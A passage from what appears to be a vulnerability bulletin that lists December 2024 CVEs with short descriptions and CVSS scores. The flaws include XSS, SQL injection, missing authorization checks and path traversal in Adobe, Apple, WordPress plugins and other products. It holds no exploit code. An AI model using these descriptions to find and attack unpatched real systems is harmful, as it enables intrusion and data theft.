Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-54039 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-54040 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-54041 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54042 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54043 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54044 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54045 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54046 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54047 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-54048 |
| lopalopa -- e-learning_management_system |
A Stored Cross Site Scripting (XSS ) was found in /teacher_avatar.php of kashipara E-learning Management System v1.0. This vulnerability allows remote attackers to execute arbitrary java script via the filename parameter. | 2024-12-09 | 5.4 | CVE-2024-54919 |
| lopalopa -- e-learning_management_system |
A Stored Cross-Site Scripting (XSS) vulnerability was found in /send_message_teacher_to_student.php of kashipara E-learning Management System v1.0. This vulnerability allows remote attackers to execute arbitrary scripts via the my_message parameter. | 2024-12-09 | 5.4 | CVE-2024-54935 |
| lopalopa -- e-learning_management_system |
A Stored Cross-Site Scripting (XSS) vulnerability was found in /send_message.php of Kashipara E-learning Management System v1.0. This vulnerability allows remote attackers to execute arbitrary scripts via the my_message parameter. | 2024-12-09 | 5.4 | CVE-2024-54936 |
| n/a -- n/a |
The Members - Membership & User Role Editor Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.10 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-12-11 | 5.3 | CVE-2024-11008 |
| n/a -- n/a |
The Restrict - membership, site, content and user access restrictions for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.8 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-12-11 | 5.3 | CVE-2024-11351 |
| n/a -- n/a |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getResumeFileDownloadById() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to download other users resumes. | 2024-12-14 | 5.3 | CVE-2024-11712 |
| n/a -- n/a |
The Web3 Crypto Payments by DePay for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/depay/wc/debug REST API endpoint in all versions up to, and including, 2.12.17. This makes it possible for unauthenticated attackers to retrieve debug infromation. | 2024-12-12 | 5.3 | CVE-2024-12265 |
| n/a -- n/a |
The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.1 via the 'get_legacy_cookies' function. This makes it possible for unauthenticated attackers to extract sensitive data including titles and permalinks of private, password-protected, pending, and draft posts. | 2024-12-11 | 5.3 | CVE-2024-12294 |
| n/a -- n/a |
The Rate My Post - Star Rating Plugin by FeedbackWP plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.4 via the get_post_status() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to vote on unpublished scheduled posts. | 2024-12-13 | 5.3 | CVE-2024-12309 |
| mayurik -- best_house_rental_management_system |
A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument page leads to file inclusion. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 5.3 | CVE-2024-12357 |
| n/a -- n/a |
The Tickera - WordPress Event Ticketing plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.5.4.8 via the 'tickera_tickets_info' endpoint. This makes it possible for unauthenticated attackers to extract sensitive data from bookings like full names, email addresses, check-in/out timestamps and more. | 2024-12-14 | 5.3 | CVE-2024-12578 |
| n/a -- n/a |
The Minify HTML plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 2.1.10. This is due to processing user-supplied input as a regular expression. This makes it possible for unauthenticated attackers to create comments that can cause catastrophic backtracking and break pages. | 2024-12-13 | 5.3 | CVE-2024-12579 |
| apple -- ipados |
A cookie management issue was addressed with improved state management. This issue is fixed in Safari 18.1, visionOS 2.1, tvOS 18.1, iOS 18.1 and iPadOS 18.1, watchOS 11.1. Cookies belonging to one origin may be sent to another origin. | 2024-12-12 | 5.3 | CVE-2024-44212 |
| n/a -- n/a |
SolarWinds Web Help Desk was susceptible to a local file read vulnerability. This vulnerability requires the software be installed on Linux and configured to use non-default development/test mode making exposure to the vulnerability very limited. | 2024-12-10 | 5.3 | CVE-2024-45709 |
| lopalopa -- e-learning_management_system |
A Directory Listing issue was found in Kashipara E-Learning Management System v1.0, which allows remote attackers to access sensitive files and directories via /admin/assets. | 2024-12-09 | 5.3 | CVE-2024-54937 |
| n/a -- n/a |
A vulnerability has been identified in COMOS V10.3 (All versions < V10.3.3.5.8), COMOS V10.4.0 (All versions), COMOS V10.4.1 (All versions), COMOS V10.4.2 (All versions), COMOS V10.4.3 (All versions < V10.4.3.0.47), COMOS V10.4.4 (All versions < V10.4.4.2), COMOS V10.4.4.1 (All versions < V10.4.4.1.21). The PDMS/E3D Engineering Interface improperly handles XML External Entity (XXE) entries when communicating with an external application. This could allow an attacker to extract any file with a known location on the user's system or accessible network folders by injecting malicious data into the communication channel between the two systems. | 2024-12-10 | 5.1 | CVE-2024-54005 |
| apple -- watchos |
A race condition was addressed with improved locking. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to leak sensitive kernel state. | 2024-12-12 | 5.1 | CVE-2024-54510 |
| n/a -- n/a |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'fieldfor', 'visibleParent' and 'id' parameters in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-14 | 4.9 | CVE-2024-11710 |
| n/a -- n/a |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'page_id' parameter of the wpjobportal_deactivate() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-14 | 4.9 | CVE-2024-11713 |
| n/a -- n/a |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'ff' parameter of the getFieldsForVisibleCombobox() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-14 | 4.9 | CVE-2024-11714 |
| n/a -- n/a |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the assignUserRole() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an employer. | 2024-12-14 | 4.8 | CVE-2024-11715 |
| classcms -- classcms |
A vulnerability classified as problematic was found in ClassCMS 4.8. Affected by this vulnerability is an unknown functionality of the file /index.php/admin of the component Model Management Page. The manipulation of the argument URL leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 4.8 | CVE-2024-12503 |
| n/a -- n/a |
Acrobat Reader versions 24.005.20307, 24.001.30213, 24.001.30193, 20.005.30730, 20.005.30710 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 4.7 | CVE-2024-49531 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could allow an attacker to execute arbitrary code in the context of the victim's browser. This issue occurs when data from a malicious source is processed by a web application's client-side scripts to update the DOM. Exploitation of this issue requires user interaction, such as convincing a victim to click on a malicious link. | 2024-12-10 | 4.6 | CVE-2024-43732 |
| n/a -- n/a |
Windows Mobile Broadband Driver Information Disclosure Vulnerability | 2024-12-12 | 4.6 | CVE-2024-49087 |
| n/a -- n/a |
A vulnerability has been identified in CPCI85 Central Processing/Communication (All versions < V05.30). The affected devices contain a secure element which is connected via an unencrypted SPI bus. This could allow an attacker with physical access to the SPI bus to observe the password used for the secure element authentication, and then use the secure element as an oracle to decrypt all encrypted update files. | 2024-12-10 | 4.6 | CVE-2024-53832 |
| n/a -- n/a |
The NotificationX - Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's content settings for notifications in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-12-12 | 4.4 | CVE-2024-11727 |
| n/a -- n/a |
The 360 Javascript Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ref' parameter in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-12-12 | 4.4 | CVE-2024-12271 |
| n/a -- n/a |
A flaw was found in the cert-manager package. This flaw allows an attacker who can modify PEM data that the cert-manager reads, for example, in a Secret resource, to use large amounts of CPU in the cert-manager controller pod to effectively create a denial-of-service (DoS) vector for the cert-manager in the cluster. | 2024-12-12 | 4.4 | CVE-2024-12401 |
| n/a -- n/a |
The Gutenberg Blocks with AI by Kadence WP - Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-12-13 | 4.4 | CVE-2024-12581 |
| n/a -- n/a |
The bodi0`s Easy cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cache-folder' parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-12-14 | 4.4 | CVE-2024-12628 |
| n/a -- n/a |
IBM OpenPages with Watson 9.0 may write sensitive information, under specific configurations, in clear text to the system tracing log files that could be obtained by a privileged user. | 2024-12-11 | 4.4 | CVE-2024-35117 |
| n/a -- n/a |
The Shortcodes for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.4 via the 'SHORTCODE_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should not have access to. | 2024-12-14 | 4.3 | CVE-2024-10690 |
| n/a -- n/a |
The Greenshift - animation and page builder blocks plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 9.9.9.3 via the 'wp_reusable_render' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to. | 2024-12-12 | 4.3 | CVE-2024-11181 |
| n/a -- n/a |
The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the /wp-json/timetics/v1/customers/ REST API endpoint in all versions up to, and including, 1.0.27. This makes it possible for authenticated attackers, with Timetics Customer access and above, to delete arbitrary users. | 2024-12-13 | 4.3 | CVE-2024-11275 |
| n/a -- n/a |
The AI Post Generator | AutoWriter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ai_post_generator_delete_Post AJAX action in all versions up to, and including, 3.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary pages and posts. | 2024-12-12 | 4.3 | CVE-2024-11709 |
| n/a -- n/a |
The Cookie Consent for WP - Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpl_script_save AJAX action in all versions up to, and including, 3.6.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to whitelist scripts. | 2024-12-12 | 4.3 | CVE-2024-11724 |
| n/a -- n/a |
The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_woocommerce_plugin() function action in all versions up to, and including, 2.1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install WooCommerce. This has a limited impact on most sites because WooCommerce is a requirement. | 2024-12-13 | 4.3 | CVE-2024-11911 |
| n/a -- n/a |
The Snippet Shortcodes plugin for WordPress is vulnerable to unauthorized Shortcode Deletion due to missing authorization in all versions up to, and including, 4.1.6. Note that a nonce is used as authentication here, but the value is leaked. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's Shortcodes. | 2024-12-12 | 4.3 | CVE-2024-12018 |
| n/a -- n/a |
The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.1 via the eli_option_value shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract arbitrary options from the wp_options table. | 2024-12-12 | 4.3 | CVE-2024-12059 |
| n/a -- n/a |
The Hash Form - Drag & Drop Form Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check when creating form styles in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to create new form styles. | 2024-12-12 | 4.3 | CVE-2024-12201 |
| n/a -- n/a |
The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cloud_delete() and cloud_update() functions in all versions up to, and including, 1.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete cloud snippets. Please note that this vulnerability was present in the Cloud Library Addon used by the plugin and not in the plugin itself, the cloud library has been removed entirely. | 2024-12-12 | 4.3 | CVE-2024-12263 |
| n/a -- n/a |
The Essential Real Estate plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on several pages/post types in all versions up to, and including, 5.1.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to access invoices and transaction logs | 2024-12-12 | 4.3 | CVE-2024-12329 |
| n/a -- n/a |
The Custom Skins Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'cf7cs_action_callback' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the content of any post and create new skins. | 2024-12-12 | 4.3 | CVE-2024-12341 |
| n/a -- n/a |
The Themify Store Locator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the setting_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-13 | 4.3 | CVE-2024-12414 |
| n/a -- n/a |
The Get Post Content Shortcode plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 0.4 via the 'post-content' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of password-protected, private, draft, and pending posts. | 2024-12-14 | 4.3 | CVE-2024-12447 |
| cjbi -- wetech-cms |
A vulnerability was found in cjbi wetech-cms 1.0/1.1/1.2. It has been rated as problematic. Affected by this issue is the function backup of the file wetech-cms-master\wetech-basic-common\src\main\java\tech\wetech\basic\util\BackupFileUtil.java of the component Database Backup Handler. The manipulation of the argument name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-12 | 4.3 | CVE-2024-12482 |
| n/a -- n/a |
The Arena.IM - Live Blogging for real-time events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.0. This is due to missing or incorrect nonce validation on the 'albfre_user_action' AJAX action. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-12 | 4.3 | CVE-2024-12526 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. | 2024-12-10 | 4.3 | CVE-2024-43716 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. | 2024-12-10 | 4.3 | CVE-2024-43717 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. | 2024-12-10 | 4.3 | CVE-2024-43731 |
| n/a -- n/a |
Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability | 2024-12-12 | 4.3 | CVE-2024-49098 |
| n/a -- n/a |
Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability | 2024-12-12 | 4.3 | CVE-2024-49099 |
| n/a -- n/a |
Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability | 2024-12-12 | 4.3 | CVE-2024-49103 |
| n/a -- n/a |
IBM InfoSphere Information Server 11.7 could allow an authenticated user to obtain sensitive information when a detailed technical error message is returned in a stack trace. This information could be used in further attacks against the system. | 2024-12-11 | 4.3 | CVE-2024-51460 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. | 2024-12-10 | 4.3 | CVE-2024-54038 |
| n/a -- n/a |
A vulnerability was found in OIDC-Client. When using the RH SSO OIDC adapter with EAP 7.x or when using the elytron-oidc-client subsystem with EAP 8.x, authorization code injection attacks can occur, allowing an attacker to inject a stolen authorization code into the attacker's own session with the client with a victim's identity. This is usually done with a Man-in-the-Middle (MitM) or phishing attack. | 2024-12-09 | 4.2 | CVE-2024-12369 |
| apple -- ipados |
An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 18.2 and iPadOS 18.2. Muting a call while ringing may not result in mute being enabled. | 2024-12-12 | 4.2 | CVE-2024-54503 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| n/a -- n/a |
The AR for WordPress plugin for WordPress is vulnerable to unauthorized double extension file upload due to a missing capability check on the set_ar_featured_image() function in all versions up to, and including, 7.3. This makes it possible for unauthenticated attackers to upload php files leveraging a double extension attack. It's important to note the file is deleted immediately and double extension attacks only work on select servers making this unlikely to be successfully exploited. | 2024-12-13 | 3.7 | CVE-2024-12300 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 3.5 | CVE-2024-43755 |
| apple -- ipados |
This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 18.1 and iPadOS 18.1. An app may be able to read sensitive location information. | 2024-12-12 | 3.3 | CVE-2024-44200 |
| apple -- ipados |
This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 18.1 and iPadOS 18.1, watchOS 11.1. An app may be able to determine a user's current location. | 2024-12-12 | 3.3 | CVE-2024-44290 |
| apple -- macos |
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.2. Privacy indicators for microphone access may be attributed incorrectly. | 2024-12-12 | 3.3 | CVE-2024-54493 |
| n/a -- n/a |
IBM InfoSphere DataStage Flow Designer (InfoSphere Information Server 11.7) could allow an authenticated user to obtain sensitive information that could aid in further attacks against the system. | 2024-12-11 | 3.1 | CVE-2023-23472 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. An attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction. | 2024-12-10 | 3.1 | CVE-2024-54050 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. An attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction. | 2024-12-10 | 3.1 | CVE-2024-54051 |
| n/a -- n/a |
IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to obtain sensitive information due to improper encryption of certain data. | 2024-12-11 | 2.5 | CVE-2023-37395 |
| apple -- iphone_os |
The issue was addressed by adding additional logic. This issue is fixed in iPadOS 17.7.3, iOS 18.2 and iPadOS 18.2. An attacker with physical access to an iOS device may be able to view notification content from the lock screen. | 2024-12-12 | 2.4 | CVE-2024-54485 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| n/a -- n/a |
A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.16.0), RUGGEDCOM ROX MX5000RE (All versions < V2.16.0), RUGGEDCOM ROX RX1400 (All versions < V2.16.0), RUGGEDCOM ROX RX1500 (All versions < V2.16.0), RUGGEDCOM ROX RX1501 (All versions < V2.16.0), RUGGEDCOM ROX RX1510 (All versions < V2.16.0), RUGGEDCOM ROX RX1511 (All versions < V2.16.0), RUGGEDCOM ROX RX1512 (All versions < V2.16.0), RUGGEDCOM ROX RX1524 (All versions < V2.16.0), RUGGEDCOM ROX RX1536 (All versions < V2.16.0), RUGGEDCOM ROX RX5000 (All versions < V2.16.0). The CLI feature in the web interface of affected devices is vulnerable to cross-site request forgery (CSRF). This could allow an attacker to read or modify the device configuration by tricking an authenticated legitimate user into accessing a malicious link. | 2024-12-10 | not yet calculated | CVE-2020-28398 |
| n/a -- n/a |
This issue affects: Secomea GateManager Version 9.5 and all prior versions. Protection Mechanism Failure vulnerability in web server of Secomea GateManager to potentially leak information to remote servers. | 2024-12-13 | not yet calculated | CVE-2021-32007 |
| n/a -- n/a |
AMI (aka American Megatrends) NTFS driver 1.0.0 (fixed in late 2021 or early 2022) has a buffer overflow. This driver is, for example, used in certain ASUS devices. | 2024-12-09 | not yet calculated | CVE-2022-29974 |
| n/a -- n/a |
Arbitrary File Upload vulnerability in Doctor-Appointment version 1.0 in /Frontend/signup_com.php, allows attackers to execute arbitrary code. | 2024-12-09 | not yet calculated | CVE-2022-38946 |
| n/a -- n/a |
SQL Injection vulnerability in Flipkart-Clone-PHP version 1.0 in entry.php in product_title parameter, allows attackers to execute arbitrary code. | 2024-12-09 | not yet calculated | CVE-2022-38947 |
| n/a -- n/a |
Missing Authorization vulnerability in StylemixThemes eRoom - Zoom Meetings & Webinar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects eRoom - Zoom Meetings & Webinar: from n/a through 1.4.6. | 2024-12-13 | not yet calculated | CVE-2022-43472 |
| n/a -- n/a |
Missing Authorization vulnerability in Pierre JEHAN Owl Carousel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Owl Carousel: from n/a through 0.5.3. | 2024-12-13 | not yet calculated | CVE-2022-44578 |
| n/a -- n/a |
Missing Authorization vulnerability in Strategy11 Form Builder Team Formidable Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Formidable Forms: from n/a through 5.5.4. | 2024-12-13 | not yet calculated | CVE-2022-45806 |
| n/a -- n/a |
Missing Authorization vulnerability in Popup Maker Popup Maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Maker: from n/a through 1.17.1. | 2024-12-13 | not yet calculated | CVE-2022-45819 |
| n/a -- n/a |
Missing Authorization vulnerability in WP Sunshine Sunshine Photo Cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sunshine Photo Cart: from n/a through 2.9.13. | 2024-12-13 | not yet calculated | CVE-2022-45826 |
| n/a -- n/a |
Missing Authorization vulnerability in Lucian Apostol Auto Affiliate Links allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Auto Affiliate Links: from n/a through 6.2.1.5. | 2024-12-13 | not yet calculated | CVE-2022-45840 |
| n/a -- n/a |
Missing Authorization vulnerability in RoboSoft Robo Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Robo Gallery: from n/a through 3.2.9. | 2024-12-13 | not yet calculated | CVE-2022-45841 |
| n/a -- n/a |
Missing Authorization vulnerability in Tyche Softwares Print Invoice & Delivery Notes for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Print Invoice & Delivery Notes for WooCommerce: from n/a through 4.7.2. | 2024-12-13 | not yet calculated | CVE-2022-46795 |
| n/a -- n/a |
Missing Authorization vulnerability in VillaTheme CURCY allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CURCY: from n/a through 2.1.25. | 2024-12-13 | not yet calculated | CVE-2022-46796 |
| n/a -- n/a |
Missing Authorization vulnerability in Lauri Karisola / WP Trio Stock Sync for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stock Sync for WooCommerce: from n/a through 2.3.2. | 2024-12-13 | not yet calculated | CVE-2022-46807 |
| n/a -- n/a |
Missing Authorization vulnerability in VillaTheme(villatheme.com) ALD - Dropshipping and Fulfillment for AliExpress and WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ALD - Dropshipping and Fulfillment for AliExpress and WooCommerce: from n/a through 1.0.21. | 2024-12-13 | not yet calculated | CVE-2022-46811 |
| n/a -- n/a |
Missing Authorization vulnerability in JS Help Desk JS Help Desk - Best Help Desk & Support Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JS Help Desk - Best Help Desk & Support Plugin: from n/a through 2.7.1. | 2024-12-13 | not yet calculated | CVE-2022-46838 |
| n/a -- n/a |
Missing Authorization vulnerability in JS Help Desk JS Help Desk - Best Help Desk & Support Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JS Help Desk - Best Help Desk & Support Plugin: from n/a through 2.7.1. | 2024-12-13 | not yet calculated | CVE-2022-46840 |
| n/a -- n/a |
Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Trending/Popular Post Slider and Widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Trending/Popular Post Slider and Widget: from n/a through 1.5.7. | 2024-12-13 | not yet calculated | CVE-2022-46846 |
| n/a -- n/a |
